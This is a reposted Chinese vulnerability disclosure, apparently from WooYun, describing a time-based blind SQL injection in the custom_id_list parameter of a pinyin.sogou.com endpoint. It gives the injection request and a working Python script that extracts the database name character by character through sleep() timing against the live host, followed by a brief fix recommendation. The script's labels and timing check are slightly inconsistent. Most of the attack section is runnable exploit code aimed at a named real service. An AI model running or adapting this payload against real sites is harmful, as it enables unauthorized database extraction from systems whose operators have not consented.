记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗SQL注入2: pinyin.sogou.com上的MySQL注射

2014-11-29 05:10

注入点位于:

_____________________________________________________________

POST http://pinyin.sogou.com/dict/ywz/ajax/make_dict.php



custom_id_list=if(0,sleep(1),0)&ywz_id_list=427

_____________________________________________________________

参数custom_id_list未过滤,可注入。

几行python脚本,猜解user():

code 区域
import httplib

import time

import string

import sys

import random

import urllib



headers = {

'Content-Type':'application/x-www-form-urlencoded',

'Cookie': '',

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}



payloads = list(string.ascii_lowercase)

payloads += list(string.ascii_uppercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.']



print 'Current user() is:'

user = ''

for i in range(1,24,1):

for payload in payloads:

try:

conn = httplib.HTTPConnection('pinyin.sogou.com', timeout=10)

rand_num = str(random.random())

url = '/dict/ywz/ajax/make_dict.php'

start_time = time.time()

conn.request(method='POST',

url=url,

body='custom_id_list=if(ascii(mid(database(),%s,1))=%s,sleep(1),0)&ywz_id_list=427' % (i, ord(payload)),

headers = headers)

html_doc = conn.getresponse().read()

conn.close()

if time.time() - start_time > 5:

raise Exception('timeout')

except:

user += payload

sys.stdout.write( user + '\r' )

sys.stdout.flush()

break





漏洞证明:

user()为: dict_4_1_3

sogou_2.png

修复方案:

参数过滤和必要的转义

知识来源: www.wooyun.org/bugs/wooyun-2014-079383

阅读:66098 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗SQL注入2: pinyin.sogou.com上的MySQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云